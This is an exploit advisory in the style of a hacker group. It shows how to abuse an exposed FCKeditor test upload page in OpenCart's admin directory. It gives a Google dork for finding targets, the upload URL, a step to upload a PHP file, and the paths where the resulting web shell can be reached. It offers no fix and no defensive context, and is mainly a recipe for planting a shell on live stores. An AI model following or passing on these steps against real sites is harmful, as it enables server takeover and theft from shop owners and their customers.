========================================== Opencart remote file Upload Vulnerability ========================================== #Exploit Title: Opencart remote file uploade #Author: Net.Edit0r #Email: Net.Edit0r@Att.Net ~ Black.Hat.tm@Gmail.com #Google dork: [inurl:Powered By OpenCart #Software Link: http://www.opencart.com/index.php?route=download/download #Platform :linux/php ######################################Iranian HackerZ#################################### # http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html # Example site: http://server # Select the "File Upload" To use = php # http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html # Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php # OR # http://server/shell.php ######################################Demo Example#################################### #Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# #Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html# ######################################################################################### #Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~ _AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ ))) ########################################## End ##########################################